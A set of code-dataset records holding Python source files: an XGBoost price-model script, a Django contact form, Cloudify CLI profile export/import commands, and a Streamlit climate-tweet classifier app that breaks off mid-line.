number of cluster \nall_data.loc[:, 'geo_cluster_7000'] = kmeans.predict(all_data[['latitude','longitude']])\n\n# 12. name, neighbourhood, thumbnail_url, zipcode \nprint(\"11. name, neighbourhood, thumbnail_url, zipcode .......... TODO better \")\nall_data['thumbnail_url_ok'] = 0 \nall_data['thumbnail_url_ok'] [all_data.thumbnail_url.isnull() == False ] = 1\n\nall_data['neighbourhood'] = all_data['neighbourhood'].fillna('UKN')\nencoder = LabelEncoder()\nencoder.fit(all_data['neighbourhood']) \nall_data['neighbourhood'] = encoder.transform(all_data['neighbourhood'])\n\nall_data['zipcode'] = all_data['zipcode'].fillna('UKN')\nencoder = LabelEncoder()\nencoder.fit(all_data['zipcode']) \nall_data['zipcode'] = encoder.transform(all_data['zipcode'])\n\n# name \nall_data['name'] = all_data['name'].fillna('')\nfeatureVec = np.zeros((len(all_data),300),dtype=\"float32\")\nwarn_w2v = 0 \nfor i in range(len(all_data)):\n words = review_to_sentences(all_data.iloc[i]['name'], tokenizer=tokenizer, stops=stops, remove_stopwords=True)\n featureVec_i = np.zeros((300),dtype=\"float32\")\n #\n nwords = 0.\n # \n #\n # Loop over each word in the review and, if it is in the model's\n # vocaublary, add its feature vector to the total\n for word in words:\n if word in embeddings_index.keys(): \n nwords = nwords + 1.\n featureVec_i = np.add(featureVec_i,embeddings_index[word])\n # \n # Divide the result by the number of words to get the average\n if nwords > 0: \n featureVec_i = np.divide(featureVec_i,nwords)\n else:\n #print(\">>> WARNING <<< No words in vocaublary\")\n warn_w2v = warn_w2v + 1 \n #print(str(words))\n featureVec[i] = featureVec_i\n\nprint(\" >> No words in vocaublary for \",warn_w2v,\"cases\")\n\npca = PCA().fit(featureVec)\nw2v_name_pca_transf = pca.transform(featureVec)\nall_data['w2v_name_pca0'] = w2v_name_pca_transf[:, 0]\nall_data['w2v_name_pca1'] = w2v_name_pca_transf[:, 1]\nall_data['w2v_name_pca2'] = w2v_name_pca_transf[:, 2]\nall_data['w2v_name_pca3'] = w2v_name_pca_transf[:, 3]\nall_data['w2v_name_pca4'] = w2v_name_pca_transf[:, 4]\nall_data['w2v_name_pca5'] = w2v_name_pca_transf[:, 5]\nall_data['w2v_name_pca6'] = w2v_name_pca_transf[:, 6]\nall_data['w2v_name_pca7'] = w2v_name_pca_transf[:, 7]\nall_data['w2v_name_pca8'] = w2v_name_pca_transf[:, 8]\nall_data['w2v_name_pca9'] = w2v_name_pca_transf[:, 9]\nall_data['w2v_name_pca10'] = w2v_name_pca_transf[:, 10]\nall_data['w2v_name_pca11'] = w2v_name_pca_transf[:, 11]\nall_data['w2v_name_pca12'] = w2v_name_pca_transf[:, 12]\n\nall_data = all_data.drop(['name','thumbnail_url',],axis=1)\n\n\n# 12. bedrooms, beds , bed_type \nall_data.bedrooms = all_data.bedrooms.fillna(0)\nall_data.beds = all_data.beds.fillna(0)\n\n## cut\n# all_data = all_data.drop(['well-lit_path_to_entrance','smartlock','garden_or_backyard','window_guards','high_chair','hot_water_kettle','pocket_wifi','babysitter_recommendations',\n# 'private_bathroom','accessible-height_bed','flat','waterfront','baby_bath','free_parking_on_street','wide_entryway','beach_essentials','accessible-height_toilet','handheld_shower_head','other_pet(s)',\n# 'wide_hallway_clearance','smooth_pathway_to_front_door','wide_clearance_to_bed','changing_table','baby_monitor','other','wide_clearance_to_shower_&_toilet','table_corner_guards','air_purifier',\n# 'bath_towel','bathtub_with_shower_chair','beachfront','body_soap','disabled_parking_spot','ev_charger','firm_matress','firm_mattress','fixed_grab_bars_for_shower_&_toilet','flat_smooth_pathway_to_front_door',\n# 'grab-rails_for_shower_and_toilet','ground_floor_access','hand_or_paper_towel','hand_soap','lake_access','paid_parking_off_premises','path_to_entrance_lit_at_night','roll-in_shower_with_chair',\n# 'ski_in/ski_out','toilet_paper','washer_/_dryer','wide_clearance_to_shower_and_toilet'],axis=1)\n\n## rem sequnece \nall_data = all_data.drop(['id'],axis=1)\n\nassert np.sum(all_data.isnull()).sum() == 0 \n\n################## \nprint('--------------> Modeling ... ')\nXtr, Xv, ytr, yv = train_test_split(all_data[:train_obs].values, y_train, test_size=0.1, random_state=1973)\ndtrain = xgb.DMatrix(Xtr, label=ytr)\ndvalid = xgb.DMatrix(Xv, label=yv)\ndtest = xgb.DMatrix(all_data[train_obs:].values)\nwatchlist = [(dtrain, 'train'), (dvalid, 'valid')]\n\n#Try different parameters! My favorite is random search :)\nxgb_pars = {'min_child_weight': 50,\n 'eta': 0.005,\n 'colsample_bytree': 0.3,\n 'max_depth': 10, \n 'subsample': 0.8,\n 'lambda': 0.5,\n 'nthread': -1,\n 'booster' : 'gbtree',\n 'silent': 1,\n 'eval_metric': 'rmse',\n 'objective': 'reg:linear'}\n\nmodel = xgb.train(xgb_pars, dtrain, 10000, watchlist, early_stopping_rounds=50,maximize=False, verbose_eval=10)\n\nprint('Modeling RMSE %.5f' % model.best_score)\n\nprint('--------------> Submission ... ')\ntest['log_price'] = model.predict(dtest)\nsubfn = \"base6_eta0005__val_\"+str(model.best_score)+\"__rnd_\"+str(model.best_iteration)+\".csv\"\ntest[['id', 'log_price']].to_csv(subfn, index=False)\n\nprint('--------------> Retrain all data + Feature importance ... ')\ndtrain = xgb.DMatrix(all_data[:train_obs].values, label=y_train)\ndtest = xgb.DMatrix(all_data[train_obs:].values)\nmodel = xgb.train(xgb_pars, dtrain, model.best_iteration+5, maximize=False, verbose_eval=10)\nprint('-----> Submission ... ')\ntest['log_price'] = model.predict(dtest)\nsubfn = \"base60005__all_data__rnd_\"+str(model.best_iteration)+\".csv\"\ntest[['id', 'log_price']].to_csv(subfn, index=False)\n\nprint('-----> Feature importance ... ')\nfeature_names = all_data.columns\nfeature_importance_dict = model.get_fscore()\nfs = ['f%i' % i for i in range(len(feature_names))]\nf1 = pd.DataFrame({'f': list(feature_importance_dict.keys()), 'importance': list(feature_importance_dict.values())})\nf2 = pd.DataFrame({'f': fs, 'feature_name': feature_names})\nfeature_importance = pd.merge(f1, f2, how='right', on='f')\nfeature_importance = feature_importance.fillna(0)\nfeature_importance.sort_values(by='importance', ascending=False)\nprint(feature_importance.sort_values)\nsubfn = \"error__feat_importance_base6eta0005.csv\" \nfeature_importance.to_csv(subfn, index=False) \n\n\n\n\n\n","sub_path":"competitions/deloitte/base6.py","file_name":"base6.py","file_ext":"py","file_size_in_byte":18702,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"63698225","text":"from django import forms\nfrom django.forms import widgets\nfrom contacto.models import Contacto\nfrom django import forms\n\n\nclass ContactoForm(forms.ModelForm):\n class Meta():\n model = Contacto\n fields = ['nombre', 'email', 'asunto', 'mensaje']\n required = ['nombre', 'email', 'mensaje']\n labels = {\n 'nombre': 'Nombre completo:',\n 'email': 'Email:',\n 'asunto': 'Asunto:',\n 'mensaje': 'Mensaje:'\n }\n widgets = {\n 'nombre': forms.TextInput(\n attrs = {\n 'class':'form-control',\n 'placeholder':'Ingrese su Apellido y Nombre/s',\n 'id':'nombre'\n }\n ),\n 'email': forms.EmailInput(\n attrs = {\n 'class':'form-control',\n 'placeholder':'example@email.com',\n 'id':'email'\n }\n ),\n 'asunto': forms.TextInput(\n attrs = {\n 'class':'form-control',\n 'placeholder':'Ingrese el asunto de su mensaje',\n 'id':'asunto'\n }\n ),\n 'mensaje': forms.Textarea(\n attrs = {\n 'class':'form-control',\n 'placeholder':'Ingrese el mensaje',\n 'id':'mensaje'\n }\n )\n }\n \n\n","sub_path":"contacto/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1494,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"252419303","text":"########\n# Copyright (c) 2014 GigaSpaces Technologies Ltd. All rights reserved\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n############\n\nimport os\nimport shutil\nimport tarfile\nfrom contextlib import closing\n\nfrom .. import env\nfrom .. import table\nfrom .. import utils\nfrom ..cli import cfy\nfrom ..cli import helptexts\nfrom ..exceptions import CloudifyCliError\n\nEXPORTED_KEYS_DIRNAME = '.exported-ssh-keys'\nEXPORTED_SSH_KEYS_DIR = os.path.join(env.PROFILES_DIR, EXPORTED_KEYS_DIRNAME)\n\n\n@cfy.group(name='profiles')\n@cfy.options.verbose()\ndef profiles():\n \"\"\"Handle Cloudify CLI profiles\n\n Each profile can manage a single Cloudify manager.\n\n A profile is automatically created when using the `cfy use`,\n and `cfy bootstrap` commands.\n\n Profiles are named according to the IP of the manager they manage.\n \"\"\"\n if not env.is_initialized():\n env.raise_uninitialized()\n\n\n@profiles.command(name='get-active',\n short_help='Retrieve profile information')\n@cfy.options.verbose()\n@cfy.pass_logger\ndef get(logger):\n \"\"\"Gets your current active profile\n \"\"\"\n active_profile_name = env.get_active_profile()\n if active_profile_name == 'local':\n logger.info(\"You're currently working in local mode. \"\n \"To use a manager run `cfy use MANAGER_IP`\"\n \" or bootstrap one\")\n return\n\n active_profile = _get_profile(env.get_active_profile())\n _print_profiles([active_profile], 'Active profile:')\n\n\n@profiles.command(name='list',\n short_help='List profiles')\n@cfy.options.verbose()\n@cfy.pass_logger\ndef list(logger):\n \"\"\"List all profiles\n \"\"\"\n current_profile = env.get_active_profile()\n\n profiles = []\n profile_names = _get_profile_names()\n for profile in profile_names:\n profile_data = _get_profile(profile)\n if profile == current_profile:\n # Show the currently active profile by appending *\n profile_data['manager_ip'] = '*' + profile_data['manager_ip']\n profiles.append(profile_data)\n\n if profiles:\n logger.info('Listing all profiles...')\n _print_profiles(profiles, 'Profiles:')\n\n if not profile_names:\n logger.info(\n 'No profiles found. You can create a new profile '\n 'by bootstrapping a manager via `cfy bootstrap` or using an '\n 'existing manager via the `cfy use` command')\n\n\n@profiles.command(name='purge-incomplete',\n short_help='Purge profiles in incomplete bootstrap state')\n@cfy.options.verbose()\n@cfy.pass_logger\ndef purge_incomplete(logger):\n \"\"\"Purge all profiles for which the bootstrap state is incomplete\n \"\"\"\n logger.info('Purging incomplete bootstrap profiles...')\n profile_names = _get_profile_names()\n for profile in profile_names:\n context = env.get_profile_context(profile)\n if context.bootstrap_state == 'Incomplete':\n logger.debug('Deleteing profiles {0}...'.format(profile))\n env.delete_profile(profile)\n logger.info('Purge complete')\n\n\n@profiles.command(name='delete',\n short_help='Delete a profile')\n@cfy.argument('profile-name')\n@cfy.options.verbose()\n@cfy.pass_logger\ndef delete(profile_name, logger):\n \"\"\"Delete a profile\n\n `PROFILE_NAME` is the IP of the manager the profile manages.\n \"\"\"\n logger.info('Deleting profile {0}...'.format(profile_name))\n try:\n env.delete_profile(profile_name)\n logger.info('Profile deleted')\n except CloudifyCliError as ex:\n logger.info(str(ex))\n\n\n@profiles.command(name='export',\n short_help='Export all profiles to an archive')\n@cfy.options.include_keys(helptexts.EXPORT_SSH_KEYS)\n@cfy.options.optional_output_path\n@cfy.options.verbose()\n@cfy.pass_logger\ndef export_profiles(include_keys, output_path, logger):\n \"\"\"Export all profiles to a file\n\n WARNING: Including the ssh keys of your profiles in the archive means\n that once the profiles are imported, the ssh keys will be put back\n in their original locations!\n\n If `-o / --output-path` is omitted, the archive's name will be\n `cfy-profiles.tar.gz`.\n \"\"\"\n _assert_profiles_exist()\n\n destination = output_path or \\\n os.path.join(os.getcwd(), 'cfy-profiles.tar.gz')\n\n # TODO: Copy exported ssh keys to each profile's directory\n logger.info('Exporting profiles to {0}...'.format(destination))\n if include_keys:\n for profile in _get_profile_names():\n _backup_ssh_key(profile)\n utils.tar(env.PROFILES_DIR, destination)\n if include_keys:\n shutil.rmtree(EXPORTED_SSH_KEYS_DIR)\n logger.info('Export complete!')\n logger.info(\n 'You can import the profiles by running '\n '`cfy profiles import PROFILES_ARCHIVE`')\n\n\n@profiles.command(name='import',\n short_help='Import profiles from an archive')\n@cfy.argument('archive-path')\n@cfy.options.include_keys(helptexts.IMPORT_SSH_KEYS)\n@cfy.options.verbose()\n@cfy.pass_logger\ndef import_profiles(archive_path, include_keys, logger):\n \"\"\"Import profiles from a profiles archive\n\n WARNING: If a profile exists both in the archive and locally\n it will be overwritten (any other profiles will be left intact).\n\n `ARCHIVE_PATH` is the path to the profiles archive to import.\n \"\"\"\n _assert_is_tarfile(archive_path)\n _assert_profiles_archive(archive_path)\n\n logger.info('Importing profiles from {0}...'.format(archive_path))\n utils.untar(archive_path, os.path.dirname(env.PROFILES_DIR))\n\n if include_keys:\n for profile in _get_profile_names():\n _restore_ssh_key(profile)\n else:\n if EXPORTED_KEYS_DIRNAME in os.listdir(env.PROFILES_DIR):\n logger.info(\"The profiles archive you provided contains ssh keys \"\n \"for one or more profiles. To restore those keys to \"\n \"their original locations, you can use the \"\n \"`--include-keys flag or copy them manually from {0} \"\n .format(EXPORTED_SSH_KEYS_DIR))\n logger.info('Import complete!')\n logger.info('You can list profiles using `cfy profiles list`')\n\n\ndef _assert_profiles_exist():\n if not _get_profile_names():\n raise CloudifyCliError('No profiles to export')\n\n\ndef _assert_profiles_archive(archive_path):\n with closing(tarfile.open(name=archive_path)) as tar:\n if not tar.getmembers()[0].name == 'profiles':\n raise CloudifyCliError(\n 'The archive provided does not seem to be a valid '\n 'Cloudify profiles archive')\n\n\ndef _assert_is_tarfile(archive_path):\n if not tarfile.is_tarfile(archive_path):\n raise CloudifyCliError('The archive provided must be a tar.gz archive')\n\n\ndef _get_profile_names():\n # TODO: This is too.. ambiguous. We should change it so there are\n # no exclusions.\n excluded = ['local', EXPORTED_KEYS_DIRNAME]\n profile_names = [item for item in os.listdir(env.PROFILES_DIR)\n if item not in excluded]\n\n return profile_names\n\n\ndef _backup_ssh_key(profile):\n return _move_ssh_key(profile, is_backup=True)\n\n\ndef _restore_ssh_key(profile):\n return _move_ssh_key(profile, is_backup=False)\n\n\n@cfy.pass_logger\ndef _move_ssh_key(profile, logger, is_backup):\n \"\"\"Iterate through all profiles and move their ssh keys\n\n This is how we backup and restore ssh keys.\n \"\"\"\n context = env.get_profile_context(profile)\n key_filepath = context.ssh_key\n if key_filepath:\n backup_path = os.path.join(\n EXPORTED_SSH_KEYS_DIR, os.path.basename(key_filepath)) + \\\n '.{0}.profile'.format(profile)\n if is_backup:\n if not os.path.isdir(EXPORTED_SSH_KEYS_DIR):\n os.makedirs(EXPORTED_SSH_KEYS_DIR)\n logger.info('Copying ssh key {0} to {1}...'.format(\n key_filepath, backup_path))\n shutil.copy2(key_filepath, backup_path)\n else:\n if os.path.isfile(backup_path):\n logger.info(\n 'Restoring ssh key for profile {0} to {1}...'.format(\n profile, key_filepath))\n shutil.move(backup_path, key_filepath)\n\n\ndef _get_profile(profile_name):\n current_profile = env.get_active_profile()\n env.set_active_profile(profile_name)\n context = env.get_profile_context(profile_name)\n env.set_active_profile(current_profile)\n\n return context.to_dict()\n\n\ndef _print_profiles(profiles, header):\n columns = [\n 'manager_ip',\n 'ssh_user',\n 'ssh_key_path',\n 'ssh_port',\n 'rest_port',\n 'rest_protocol',\n 'manager_username',\n 'bootstrap_state'\n ]\n pt = table.generate(columns, data=profiles)\n table.log(header, pt)\n","sub_path":"cloudify_cli/commands/profiles.py","file_name":"profiles.py","file_ext":"py","file_size_in_byte":9359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"431281411","text":"\"\"\"\n\n Simple Streamlit webserver application for serving developed classification\n models.\n\n models.\n Author: Explore Data Science Academy.\n\n Note:\n ---------------------------------------------------------------------\n Plase follow the instructions provided within the README.md file\n located within this directory for guidance on how to use this script\n correctly.\n ---------------------------------------------------------------------\n\n Description: This file is used to launch a minimal streamlit web\n application. You are expected to extend the functionality of this script\n as part of your predict project.\n\n For further help with the Streamlit framework, see:\n\n https://docs.streamlit.io/en/latest/\n\n application. You are expected to extend the functionality of this script\n as part of your predict project.\n For further help with the Streamlit framework, see:\n https://docs.streamlit.io/en/latest/\n\"\"\"\n# Streamlit dependencies\nimport streamlit as st\nimport joblib\nimport os\nimport pickle\nfrom markdown import markdown\n\n# Data dependencies\nimport pandas as pd\nimport numpy as np\n\n# Text processing\nimport spacy\nimport nltk\nfrom nltk.corpus import stopwords\nfrom nltk.tokenize import TweetTokenizer, word_tokenize\nimport string\nimport re\n\n# Data processing\nfrom sklearn.utils import resample\nfrom sklearn.feature_extraction import text\nfrom sklearn.model_selection import train_test_split\n\n# Visual dependencies\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom wordcloud import WordCloud\nfrom bs4 import BeautifulSoup\nfrom PIL import Image\nimport plotly.graph_objects as go\n\n\nmatplotlib.use(\"Agg\")\nplt.style.use('ggplot')\n\n# Create a spaCy tokenizer\nspacy.load('en')\nlemmatizer = spacy.lang.en.English()\n\n\ndef tokenize(text):\n tokens = lemmatizer(text)\n return [token.lemma_ for token in tokens]\n\n# Load necessary data\nfile = open(\"resources/mod_and_vect.pkl\", \"rb\")\nTF_1 = pickle.load(file)\nTF_2 = pickle.load(file)\nCV_2 = pickle.load(file)\nNL_SVM_TF1 = pickle.load(file)\nLR_TF2 = pickle.load(file)\nLSVM = pickle.load(file)\nLRCV = pickle.load(file)\nfile.close()\n\n# Load your raw data\nread_and_cache_csv = st.cache(pd.read_csv, allow_output_mutation=True)\nraw = read_and_cache_csv(\"resources/kaggle_train.csv\")\n\n\ndef get_key(val, my_dict):\n for key, value in my_dict.items():\n if val == value:\n return key\n\n\n# define custom functions to be used\n@st.cache\ndef clean_text(text):\n text = str(text).lower()\n text = re.sub('\\[.*?\\]', '', text)\n text = re.sub('https?://\\S+|www\\.\\S+', 'URL', text)\n text = re.sub('<.*?>+', '', text)\n text = re.sub('[%s]' % re.escape(string.punctuation), '', text)\n text = re.sub('\\n', '', text)\n text = re.sub('\\w*\\d\\w*', '', text)\n return text\n\n\n@st.cache(persist=True)\ndef prep_eda_df(df):\n\n # preprocess eda data\n # Tweet length by word count, character count, and punctuation count\n eda_data = raw.copy()\n # Extract URL's\n pattern_url = r'(http[s]?://(?:[A-Za-z]|[0-9]|[$-_@.&+]|[!*\\(\\),]|(?:%[0-9A-Fa-f][0-9A-Fa-f]))+)'\n eda_data['Url'] = eda_data['message'].str.extract(pattern_url)\n # Replace URL with string 'web-url'\n eda_data['message'] = eda_data['message'].replace(pattern_url, 'web-url', regex=True)\n\n # Clean text with clean_text() function\n eda_data['clean_tweet'] = eda_data['message'].apply(lambda x: clean_text(x))\n\n # Tokenize tweets with nltk\n # tokeniser = word_tokenize()\n eda_data['tokens'] = eda_data['message'].apply(word_tokenize)\n eda_data['tweet_length'] = eda_data['tokens'].str.len()\n\n # Tweet Character count column\n eda_data['character_count'] = eda_data['message'].apply(lambda c: len(c))\n # repeat for punctuation\n eda_data['punctuation_count'] = eda_data['message'].apply(lambda x: len([i for i in str(x) if i in string.punctuation]))\n eda_df = eda_data.copy()\n return eda_df\n\neda_data = prep_eda_df(raw)\n\nsent_dict = {-1: 'Anti', 0: 'Neutral', 1: 'Pro', 2: 'News'}\n\n\ndef sent_kde_plots(df, values, target):\n fig, ax = plt.subplots()\n col = list(df[target].unique())\n\n for c in col:\n sns.kdeplot(df[values][df[target] == c], shade=True, label=sent_dict.get(c))\n\n plt.xlabel(values)\n plt.ylabel('Density')\n plt.title('Distribution of Tweet {}'.format(values))\n return\n\n\ndef wordcloud_gen(df, target, values):\n sent = list(df[target].unique())\n dft = train_data.groupby(target)[values].apply(' '.join)\n for s in sent:\n text = dft[s]\n wordcloud = WordCloud(background_color='white', max_words=100,\n max_font_size=50).generate(text)\n plt.figure()\n plt.imshow(wordcloud, interpolation='bilinear')\n plt.title('Tweets under {} Class'.format(s))\n plt.axis('off')\n return\n\n\n# label the sentiments\ndef sentiment_label(df_):\n if df_['sentiment'] == 2:\n return \"News\"\n elif df_['sentiment'] == 1:\n return \"Pro\"\n elif df_['sentiment'] == 0:\n return \"Neutral\"\n elif df_['sentiment'] == -1:\n return \"Anti\"\n\nraw[\"label\"] = raw.apply(sentiment_label, axis=1)\n\n\n# The main function where we will build the actual app\ndef main():\n \"\"\"Tweet Classifier App with Streamlit \"\"\"\n\n # Creates a main title and subheader on your page -\n # these are static across all pages\n\n st.title(\"Tweet Classifier\")\n st.subheader(\"Climate change tweet classification\")\n\n # Creating sidebar\n # you can create multiple pages this way\n st.sidebar.title(\"Pages\")\n selection = st.sidebar.radio(label=\"\", options=[\"Information\", \"EDA and Insights\", \"Prediction\", \"Technical\"])\n\n # Building out the \"Information\" page\n if selection == \"Information\":\n st.info(\"With the change in time, consumers have become more conscious about acquiring products/services from brands that uphold certain values and ideals. They also consider the service provider's stances towards issues such as climate change. In order to appeal to these consumers, organisations should understand their sentiments. They need to understand how their products will be received whilst trying to decrease their environmental impact or carbon footprint. This can be achieved using Machine Learning.\")\n\n # You can read a markdown file from supporting resources folder\n if st.button(\"What is Machine Learning\"):\n what_ml = (open('resources/what_is_ML.md').read())\n st.markdown(what_ml, unsafe_allow_html=True)\n\n ml_image = Image.open(\"resources/imgs/ml_pic.jpg\")\n st.image(ml_image, use_column_width=True)\n\n # to add info on machine learning here\n if st.button(\"How does the app work\"):\n app_info = markdown(open(\"resources/info.md\").read())\n st.markdown(app_info, unsafe_allow_html=True)\n\n st.subheader(\"Description of Sentiment Classes\")\n descrip_image = Image.open(\"resources/imgs/climate_data_sentiment_description.png\")\n st.image(descrip_image, use_column_width=True)\n\n st.subheader(\"Raw Twitter data and label\")\n if st.checkbox('Show raw data'): # data is hidden if box is unchecked\n st.write(raw) # will write the df to the page\n\n # Building out the predication page\n if selection == \"Prediction\":\n st.info(\"Climate Change belief with ML Models utilising NLP\")\n st.subheader(\"What is NLP\")\n\n what_nlp = markdown(open(\"resources/what_is_nlp.md\").read())\n st.markdown(what_nlp, unsafe_allow_html=True)\n raw = pd.read_csv(\"resources/train.csv\")\n\n nlp_img = Image.open('resources/imgs/nlp_pipeline_img.png')\n st.image(nlp_img, use_column_width=True)\n\n # Detect and remove duplicate rows\n raw = raw.drop_duplicates(subset=['message'])\n\n # Remove blanks\n def remove_blanks(df):\n blanks = []\n for index, tweet in enumerate(df['message']):\n if type(tweet) == str:\n if tweet in ['', ' ']:\n blanks.append(index)\n return df.drop(blanks)\n raw = remove_blanks(raw)\n\n # Remove special characters\n def clean_text(text):\n text = str(text).lower()\n text = re.sub('\\[.*?\\]', '', text)\n text = re.sub('https?://\\S+|www\\.\\S+', 'URL', text)\n text = re.sub('<.*?>+', '', text)\n text = re.sub('[%s]' % re.escape(string.punctuation), '', text)\n text = re.sub('\\n', '', text)\n text = re.sub('\\w*\\d\\w*', '', text)\n return text\n raw['clean_tweet'] = raw['message'].apply(lambda x: clean_text(x))\n\n # Remove stop-words\n stop_words = stopwords.words('english') # Assign stop_words list\n\n def remove_stopword(text):\n return [word for word in text.split() if word not in stop_words]\n raw['clean_tweet'] = raw['clean_tweet'].apply(lambda x: remove_stopword(x))\n\n # Join text\n def join_text(text):\n text = ' '.join(text)\n return text\n raw['clean_tweet'] = raw['clean_tweet'].apply(lambda x: join_text(x))\n\n # Assign feature and response variables\n X = raw['clean_tweet']\n y = raw['sentiment']\n\n # Addressing imbalance\n heights = [len(y[y == label]) for label in [0, 1, 2, -1]]\n bars = pd.DataFrame(zip(heights, [0, 1, 2, -1]), columns=['heights', 'labels'])\n bars = bars.sort_values(by='heights',ascending=True)\n\n # Let's pick a class size of roughly half the size of the largest size\n class_size = 3500\n bar_label_df = bars.set_index('labels')\n resampled_classes = []\n\n for label in [0, 1, 2, -1]:\n # Get number of observations from this class\n label_size = bar_label_df.loc[label]['heights']\n\n # If label_size < class size the upsample, else downsample\n if label_size < class_size:\n # Upsample\n label_data = raw[['clean_tweet', 'sentiment']][raw['sentiment'] == label]\n label_resampled = resample(label_data,\n # sample with replacement\n # (we need to duplicate observations)\n replace=True,\n # number of desired samples\n n_samples=class_size,\n random_state=27)\n else:\n # Downsample\n label_data = raw[['clean_tweet', 'sentiment']][raw['sentiment'] == label]\n label_resampled = resample(label_data,\n # sample without replacement\n # (no need for duplicate observations)\n replace=False,\n # number of desired samples\n n_samples=class_size,\n random_state=27)\n\n resampled_classes.append(label_resampled)\n\n # Assign feature and response variables from resampled data\n resampled_data = np.concatenate(resampled_classes, axis=0)\n\n X_resampled = resampled_data[:, :-1]\n y_resampled = resampled_data[:, -1]\n\n df_resampled = pd.DataFrame(X_resampled.reshape(-1, 1))\n df_resampled.columns = ['tweet']\n df_resampled['sentiment'] = y_resampled\n df_resampled['sentiment'] = df_resampled['sentiment'].astype('int')\n\n # Splitting data\n X_train, X_test, y_train, y_test = train_test_split(df_resampled['tweet'].values,\n df_resampled['sentiment'].values,\n test_size=0.1, random_state=42)\n\n # Create a spaCy tokenizer\n spacy.load('en')\n lemmatizer = spacy.lang.en.English()\n\n def tokenize(text):\n tokens = lemmatizer(text)\n return [token.lemma_ for token in tokens]\n\n # Creating a text box for user input\n tweet_text = st.text_area(\"Enter Text\", \"Type Here\")\n\n models_dict = {'Linear Support Vector Classifier': LSVM,\n 'Non-Linear Support Vector Classifier': NL_SVM_TF1,\n 'Logistic Regression CV': LRCV,\n 'Logistic Regression TFiDF': LR_TF2}\n\n choice = st.selectbox(\"Please choose a Classification Model\",\n list(models_dict.keys()))\n model = models_dict.get(choice)\n\n mod_vect_dict = {LSVM: CV_2, NL_SVM_TF1: TF_1, LRCV: CV_2, LR_TF2: TF_2}\n\n if st.button(\"Classify\"):\n # Transforming user input with vectorizer\n vect = mod_vect_dict.get(model)\n vect_text = vect.transform([tweet_text]).toarray()\n predictor = model\n prediction = predictor.predict(vect_text)\n\n # When model has successfully run, will print prediction\n # You can use a dictionary or similar structure to make this output\n # more human interpretable.\n pred_labels = {\"Anti Climate Change\": -1,\n \"Neutral toward Climate Change\": 0,\n \"Pro Climate Change\": 1,\n \"News about Climate Change\": 2}\n\n result = get_key(prediction, pred_labels)\n st.success(\"Text Categorized as: {}\".format(result))\n\n # Building EDA and Insights page\n # eda = st.sidebar.select()\n if selection == \"EDA and Insights\":\n st.info('This page is dedicated to Exploratory Data Analysis and insights gained form it.')\n\n # load data\n raw = read_and_cache_csv(\"resources/kaggle_train.csv\")\n\n # Adding to sidebar\n st.sidebar.title(\"EDA and Insights\")\n st.sidebar.info('Use the multislect box below to view graphs by sentiment, Insight text applies to graphs with all selected sentiments.')\n sentiment = raw[\"label\"].unique().tolist()\n select_sent = st.sidebar.multiselect('View Analysis by sentiment', sentiment, default=sentiment)\n\n st.markdown('### **Exploratory Data Aanalysis**')\n st.markdown('When conducting Exploratory Data Analysis, we try and look at the data from all angles, by inspecting and visualising to extract any insights that we can. This can sometimes give surprising results, and as such we try to explore any possible connections, as well as outliers, or any group/class/type that differs from the rest. In this app we will be exploring the distributions of our data from different aspects, combined with what makes it unique, or where the data is strengthened by similarities.
    In doing so we summarize the main characters of the data and gain insight on what the data can tell us. In this regard get more understanding about what it represents and how to apply it.', unsafe_allow_html=True)\n if st.checkbox(\"Preview DataFrame\"):\n if st.button(\"Tail\"):\n st.write(raw.tail())\n else:\n st.write(raw.head())\n\n # Add image description of sentiment\n st.subheader(\"Description of Sentiment Classes\")\n descrip_image = Image.open(\"resources/imgs/climate_data_sentiment_description.png\")\n st.image(descrip_image, use_column_width=True)\n\n # mask to filter dataframe\n mask_sentiment = raw['label'].isin(select_sent)\n data = raw[mask_sentiment]\n\n st.markdown('### Data Distribution ###')\n\n # Sentiment Distribution\n fig, ax = plt.subplots(figsize=(10, 5))\n # graph = sns.countplot(x = 'sentiment', data = raw)\n graph = sns.countplot(x='label', data=data)\n plt.title('Distribution of Sentiment classes count')\n st.pyplot()\n\n # Insight\n st.markdown('More than half of the tweets , precisely 50,76%, belong to class 1. This indicates that the majority of tweets collected support the belief that man-made climate change exists. Conversely, 8.58% of the tweets collected are class -1, which represents tweets that do not believe in man-made climate change. Tweets that link to factual news about climate change comprise 24,89% whilst tweets which are neutral (neither supports nor refutes the belief of man-made climate change) make up 15,77% of the dataset. These are represented by the classes 2 and 0 respectively.
    The class imbalance will need to be addressed to avoid the model being biased towards classifying sentiments as the majority class because the model will be well-versed in identifying it.', unsafe_allow_html=True)\n\n df = eda_data[mask_sentiment]\n\n st.markdown(\"### **Visualisations** ###\")\n\n if st.checkbox('View Tweet length distributions'):\n\n st.markdown('The first of these explorations will be in the length of various parts of the Tweet body')\n\n # generate tweet length graph\n sent_kde_plots(df, 'tweet_length', 'sentiment')\n st.pyplot()\n\n st.markdown('Looking at the number of words per tweet, although classes 0 and 1 have the same maximum number of words per tweet at 31 words, classes -1 and 1 have the highest average number of words per tweet at ~19 words. This suggests that people that sent out tweets which are anti and pro man-made climate change send out tweets with more words. News tweets generally have the least number of words with a maximum of 26 and an average of ~16 words per tweet. They do however also display more of a normal distribution, insinuating that news tweets are more consistent in the number of words. The number of words of tweets which are classified as neutral have the greatest distribution with a standard deviation of ~6 words, they vary from \"few\" to \"many\" words in a tweet.')\n\n # generate character count graph\n sent_kde_plots(df, 'character_count', 'sentiment')\n st.pyplot()\n\n st.write('A similar pattern as established by the number of words per tweet is displayed by the number of characters per tweet. Classes 1 and 0 have the the first and second maximum number of characters per tweet at at 208 and 166 characters respectively. However, classes 1 and -1 have the highest average number of characters per tweet at ~127 and ~124 characters. A slight difference is that class 2 tweets are on average longer than neutral tweets.')\n\n # generate punctuation count graph\n sent_kde_plots(df, 'punctuation_count', 